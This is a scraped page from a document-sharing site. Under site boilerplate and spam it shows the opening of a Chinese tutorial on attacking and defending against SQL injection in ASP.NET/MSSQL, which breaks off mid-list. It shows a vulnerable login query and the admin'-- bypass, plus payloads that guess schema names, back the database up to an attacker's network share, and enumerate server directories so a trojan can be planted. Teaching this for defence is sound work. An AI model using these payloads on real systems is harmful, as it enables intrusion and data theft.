- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
sql注入攻防入门讲解
毕业开始从事winfrm到今年转到?web?,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机会接触相关开发……必须的各种借口。这几天把sql注入的相关知识整理了下,希望大家多多提意见。 (对于sql注入的攻防,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门查看大量前辈们的心得,这方面的资料颇多,将其精简出自己觉得重要的,就成了该文) ? ????下面的程序方案是采用?ASP.NET + MSSQL,其他技术在设置上会有少许不同。??? ???? HYPERLINK /heyuquan/SQL%E6%B3%A8%E5%85%A5%E6%94%BB%E9%98%B2%E5%85%A5%E9%97%A8%E8%AF%A6%E8%A7%A3_%E7%A4%BA%E4%BE%8B.rar \t _blank 示例程序下载:SQL注入攻防入门详解_示例 ? 什么是SQL注入(SQL Injection) 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。 ? ? 尝尝SQL注入 1.???一个简单的登录页面 关键代码:(详细见下载的示例代码) 1 2 3 4 5 6 privateboolNoProtectLogin(string?userName, string?password) { int?count = (int)SqlHelper.Instance.ExecuteScalar(string.Format ???????(SELECT COUNT(*) FROM Login WHERE UserName={0} AND Password={1}, userName, password)); return?count 0 ? true?: false; } 方法中userName和?password?是没有经过任何处理,直接拿前端传入的数据,这样拼接的SQL会存在注入漏洞。(帐户:admin??123456) ? 1)???输入正常数据,效果如图: 合并的SQL为: SELECT COUNT(*) FROM Login WHERE UserName=admin AND Password=123456 ? 2)???输入注入数据: 如图,即用户名为:用户名:admin’—,密码可随便输入 ????合并的SQL为: ????SELECT COUNT(*) FROM Login WHERE UserName=admin-- Password=123 因为UserName值中输入了“--”注释符,后面语句被省略而登录成功。(常常的手法:前面加上; (分号,用于结束前一条语句),后边加上-- (用于注释后边的语句)) ? 2.???上面是最简单的一种SQL注入,常见的注入语句还有: 1)???猜测数据库名,备份数据库 a)???猜测数据库名:?and db_name() 0?或系统表master.dbo.sysdatabases b)???备份数据库:;backup database?数据库名?to disk = ‘c:\*.db’;-- 或:declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat ,name=test;-- 2)???猜解字段名称 a)???猜解法:and (select count(字段名) from?表名)0???若“字段名”存在,则返回正常 b)???读取法:and (select top 1 col_name(object_id(表名),1) from sysobjects)0???把col_name(object_id(表名),1)中的1依次换成2,3,4,5,6…就可得到所有的字段名称。 3)???遍历系统的目录结构,分析结构并发现WEB虚拟目录(服务器上传木马) ????先创建一个临时表:;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- a)???利用xp_availablemedia来获得当前所有驱动器,并存入temp表中 ;insert temp exec master.dbo.xp_availablemedia;-- b)???利用xp_subdirs获得子目录列表,并存入tem
文档评论(0)